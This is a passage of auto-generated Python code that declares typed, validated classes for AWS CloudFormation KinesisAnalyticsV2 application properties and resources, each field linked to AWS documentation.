"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters-csvmappingparameters"""
p_JSONMappingParameters: typing.Union['PropApplicationReferenceDataSourceJSONMappingParameters', dict] = attr.ib(
default=None,
converter=PropApplicationReferenceDataSourceJSONMappingParameters.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationReferenceDataSourceJSONMappingParameters)),
metadata={AttrMeta.PROPERTY_NAME: "JSONMappingParameters"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-mappingparameters-jsonmappingparameters"""
@attr.s
class PropApplicationRecordFormat(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.RecordFormat"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordformat.html
Property Document:
- ``rp_RecordFormatType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordformat.html#cfn-kinesisanalyticsv2-application-recordformat-recordformattype
- ``p_MappingParameters``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordformat.html#cfn-kinesisanalyticsv2-application-recordformat-mappingparameters
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.RecordFormat"
rp_RecordFormatType: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "RecordFormatType"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordformat.html#cfn-kinesisanalyticsv2-application-recordformat-recordformattype"""
p_MappingParameters: typing.Union['PropApplicationMappingParameters', dict] = attr.ib(
default=None,
converter=PropApplicationMappingParameters.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationMappingParameters)),
metadata={AttrMeta.PROPERTY_NAME: "MappingParameters"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-recordformat.html#cfn-kinesisanalyticsv2-application-recordformat-mappingparameters"""
@attr.s
class PropApplicationReferenceDataSourceRecordFormat(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.RecordFormat"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordformat.html
Property Document:
- ``rp_RecordFormatType``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordformat.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordformat-recordformattype
- ``p_MappingParameters``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordformat.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordformat-mappingparameters
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.RecordFormat"
rp_RecordFormatType: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "RecordFormatType"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordformat.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordformat-recordformattype"""
p_MappingParameters: typing.Union['PropApplicationReferenceDataSourceMappingParameters', dict] = attr.ib(
default=None,
converter=PropApplicationReferenceDataSourceMappingParameters.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationReferenceDataSourceMappingParameters)),
metadata={AttrMeta.PROPERTY_NAME: "MappingParameters"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-recordformat.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-recordformat-mappingparameters"""
@attr.s
class PropApplicationInputSchema(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.InputSchema"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html
Property Document:
- ``rp_RecordColumns``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html#cfn-kinesisanalyticsv2-application-inputschema-recordcolumns
- ``rp_RecordFormat``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html#cfn-kinesisanalyticsv2-application-inputschema-recordformat
- ``p_RecordEncoding``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html#cfn-kinesisanalyticsv2-application-inputschema-recordencoding
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.InputSchema"
rp_RecordColumns: typing.List[typing.Union['PropApplicationRecordColumn', dict]] = attr.ib(
default=None,
converter=PropApplicationRecordColumn.from_list,
validator=attr.validators.deep_iterable(member_validator=attr.validators.instance_of(PropApplicationRecordColumn), iterable_validator=attr.validators.instance_of(list)),
metadata={AttrMeta.PROPERTY_NAME: "RecordColumns"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html#cfn-kinesisanalyticsv2-application-inputschema-recordcolumns"""
rp_RecordFormat: typing.Union['PropApplicationRecordFormat', dict] = attr.ib(
default=None,
converter=PropApplicationRecordFormat.from_dict,
validator=attr.validators.instance_of(PropApplicationRecordFormat),
metadata={AttrMeta.PROPERTY_NAME: "RecordFormat"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html#cfn-kinesisanalyticsv2-application-inputschema-recordformat"""
p_RecordEncoding: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "RecordEncoding"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-inputschema.html#cfn-kinesisanalyticsv2-application-inputschema-recordencoding"""
@attr.s
class PropApplicationReferenceDataSourceReferenceSchema(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.ReferenceSchema"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html
Property Document:
- ``rp_RecordColumns``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referenceschema-recordcolumns
- ``rp_RecordFormat``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referenceschema-recordformat
- ``p_RecordEncoding``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referenceschema-recordencoding
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.ReferenceSchema"
rp_RecordColumns: typing.List[typing.Union['PropApplicationReferenceDataSourceRecordColumn', dict]] = attr.ib(
default=None,
converter=PropApplicationReferenceDataSourceRecordColumn.from_list,
validator=attr.validators.deep_iterable(member_validator=attr.validators.instance_of(PropApplicationReferenceDataSourceRecordColumn), iterable_validator=attr.validators.instance_of(list)),
metadata={AttrMeta.PROPERTY_NAME: "RecordColumns"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referenceschema-recordcolumns"""
rp_RecordFormat: typing.Union['PropApplicationReferenceDataSourceRecordFormat', dict] = attr.ib(
default=None,
converter=PropApplicationReferenceDataSourceRecordFormat.from_dict,
validator=attr.validators.instance_of(PropApplicationReferenceDataSourceRecordFormat),
metadata={AttrMeta.PROPERTY_NAME: "RecordFormat"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referenceschema-recordformat"""
p_RecordEncoding: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "RecordEncoding"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referenceschema.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referenceschema-recordencoding"""
@attr.s
class PropApplicationInput(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.Input"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html
Property Document:
- ``rp_InputSchema``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-inputschema
- ``rp_NamePrefix``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-nameprefix
- ``p_InputParallelism``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-inputparallelism
- ``p_InputProcessingConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-inputprocessingconfiguration
- ``p_KinesisFirehoseInput``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-kinesisfirehoseinput
- ``p_KinesisStreamsInput``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-kinesisstreamsinput
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.Input"
rp_InputSchema: typing.Union['PropApplicationInputSchema', dict] = attr.ib(
default=None,
converter=PropApplicationInputSchema.from_dict,
validator=attr.validators.instance_of(PropApplicationInputSchema),
metadata={AttrMeta.PROPERTY_NAME: "InputSchema"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-inputschema"""
rp_NamePrefix: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "NamePrefix"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-nameprefix"""
p_InputParallelism: typing.Union['PropApplicationInputParallelism', dict] = attr.ib(
default=None,
converter=PropApplicationInputParallelism.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationInputParallelism)),
metadata={AttrMeta.PROPERTY_NAME: "InputParallelism"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-inputparallelism"""
p_InputProcessingConfiguration: typing.Union['PropApplicationInputProcessingConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationInputProcessingConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationInputProcessingConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "InputProcessingConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-inputprocessingconfiguration"""
p_KinesisFirehoseInput: typing.Union['PropApplicationKinesisFirehoseInput', dict] = attr.ib(
default=None,
converter=PropApplicationKinesisFirehoseInput.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationKinesisFirehoseInput)),
metadata={AttrMeta.PROPERTY_NAME: "KinesisFirehoseInput"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-kinesisfirehoseinput"""
p_KinesisStreamsInput: typing.Union['PropApplicationKinesisStreamsInput', dict] = attr.ib(
default=None,
converter=PropApplicationKinesisStreamsInput.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationKinesisStreamsInput)),
metadata={AttrMeta.PROPERTY_NAME: "KinesisStreamsInput"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-kinesisstreamsinput"""
@attr.s
class PropApplicationSqlApplicationConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.SqlApplicationConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-sqlapplicationconfiguration.html
Property Document:
- ``p_Inputs``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-sqlapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-sqlapplicationconfiguration-inputs
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.SqlApplicationConfiguration"
p_Inputs: typing.List[typing.Union['PropApplicationInput', dict]] = attr.ib(
default=None,
converter=PropApplicationInput.from_list,
validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(PropApplicationInput), iterable_validator=attr.validators.instance_of(list))),
metadata={AttrMeta.PROPERTY_NAME: "Inputs"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-sqlapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-sqlapplicationconfiguration-inputs"""
@attr.s
class PropApplicationReferenceDataSourceReferenceDataSource(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.ReferenceDataSource"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html
Property Document:
- ``rp_ReferenceSchema``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource-referenceschema
- ``p_S3ReferenceDataSource``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource-s3referencedatasource
- ``p_TableName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource-tablename
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.ReferenceDataSource"
rp_ReferenceSchema: typing.Union['PropApplicationReferenceDataSourceReferenceSchema', dict] = attr.ib(
default=None,
converter=PropApplicationReferenceDataSourceReferenceSchema.from_dict,
validator=attr.validators.instance_of(PropApplicationReferenceDataSourceReferenceSchema),
metadata={AttrMeta.PROPERTY_NAME: "ReferenceSchema"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource-referenceschema"""
p_S3ReferenceDataSource: typing.Union['PropApplicationReferenceDataSourceS3ReferenceDataSource', dict] = attr.ib(
default=None,
converter=PropApplicationReferenceDataSourceS3ReferenceDataSource.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationReferenceDataSourceS3ReferenceDataSource)),
metadata={AttrMeta.PROPERTY_NAME: "S3ReferenceDataSource"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource-s3referencedatasource"""
p_TableName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "TableName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource-tablename"""
@attr.s
class PropApplicationApplicationConfiguration(Property):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application.ApplicationConfiguration"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html
Property Document:
- ``p_ApplicationCodeConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-applicationcodeconfiguration
- ``p_ApplicationSnapshotConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-applicationsnapshotconfiguration
- ``p_EnvironmentProperties``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-environmentproperties
- ``p_FlinkApplicationConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-flinkapplicationconfiguration
- ``p_SqlApplicationConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-sqlapplicationconfiguration
- ``p_ZeppelinApplicationConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-zeppelinapplicationconfiguration
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.ApplicationConfiguration"
p_ApplicationCodeConfiguration: typing.Union['PropApplicationApplicationCodeConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationApplicationCodeConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationApplicationCodeConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "ApplicationCodeConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-applicationcodeconfiguration"""
p_ApplicationSnapshotConfiguration: typing.Union['PropApplicationApplicationSnapshotConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationApplicationSnapshotConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationApplicationSnapshotConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "ApplicationSnapshotConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-applicationsnapshotconfiguration"""
p_EnvironmentProperties: typing.Union['PropApplicationEnvironmentProperties', dict] = attr.ib(
default=None,
converter=PropApplicationEnvironmentProperties.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationEnvironmentProperties)),
metadata={AttrMeta.PROPERTY_NAME: "EnvironmentProperties"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-environmentproperties"""
p_FlinkApplicationConfiguration: typing.Union['PropApplicationFlinkApplicationConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationFlinkApplicationConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationFlinkApplicationConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "FlinkApplicationConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-flinkapplicationconfiguration"""
p_SqlApplicationConfiguration: typing.Union['PropApplicationSqlApplicationConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationSqlApplicationConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationSqlApplicationConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "SqlApplicationConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-sqlapplicationconfiguration"""
p_ZeppelinApplicationConfiguration: typing.Union['PropApplicationZeppelinApplicationConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationZeppelinApplicationConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationZeppelinApplicationConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "ZeppelinApplicationConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-zeppelinapplicationconfiguration"""
#--- Resource declaration ---
@attr.s
class ApplicationCloudWatchLoggingOption(Resource):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationCloudWatchLoggingOption"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationcloudwatchloggingoption.html
Property Document:
- ``rp_ApplicationName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationcloudwatchloggingoption.html#cfn-kinesisanalyticsv2-applicationcloudwatchloggingoption-applicationname
- ``rp_CloudWatchLoggingOption``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationcloudwatchloggingoption.html#cfn-kinesisanalyticsv2-applicationcloudwatchloggingoption-cloudwatchloggingoption
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationCloudWatchLoggingOption"
rp_ApplicationName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ApplicationName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationcloudwatchloggingoption.html#cfn-kinesisanalyticsv2-applicationcloudwatchloggingoption-applicationname"""
rp_CloudWatchLoggingOption: typing.Union['PropApplicationCloudWatchLoggingOptionCloudWatchLoggingOption', dict] = attr.ib(
default=None,
converter=PropApplicationCloudWatchLoggingOptionCloudWatchLoggingOption.from_dict,
validator=attr.validators.instance_of(PropApplicationCloudWatchLoggingOptionCloudWatchLoggingOption),
metadata={AttrMeta.PROPERTY_NAME: "CloudWatchLoggingOption"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationcloudwatchloggingoption.html#cfn-kinesisanalyticsv2-applicationcloudwatchloggingoption-cloudwatchloggingoption"""
@attr.s
class Application(Resource):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::Application"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html
Property Document:
- ``rp_RuntimeEnvironment``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-runtimeenvironment
- ``rp_ServiceExecutionRole``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-serviceexecutionrole
- ``p_ApplicationConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationconfiguration
- ``p_ApplicationDescription``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationdescription
- ``p_ApplicationMode``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationmode
- ``p_ApplicationName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationname
- ``p_Tags``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-tags
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application"
rp_RuntimeEnvironment: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "RuntimeEnvironment"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-runtimeenvironment"""
rp_ServiceExecutionRole: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ServiceExecutionRole"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-serviceexecutionrole"""
p_ApplicationConfiguration: typing.Union['PropApplicationApplicationConfiguration', dict] = attr.ib(
default=None,
converter=PropApplicationApplicationConfiguration.from_dict,
validator=attr.validators.optional(attr.validators.instance_of(PropApplicationApplicationConfiguration)),
metadata={AttrMeta.PROPERTY_NAME: "ApplicationConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationconfiguration"""
p_ApplicationDescription: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "ApplicationDescription"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationdescription"""
p_ApplicationMode: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "ApplicationMode"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationmode"""
p_ApplicationName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "ApplicationName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationname"""
p_Tags: typing.List[typing.Union[Tag, dict]] = attr.ib(
default=None,
converter=Tag.from_list,
validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(Tag), iterable_validator=attr.validators.instance_of(list))),
metadata={AttrMeta.PROPERTY_NAME: "Tags"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-tags"""
@attr.s
class ApplicationOutput(Resource):
"""
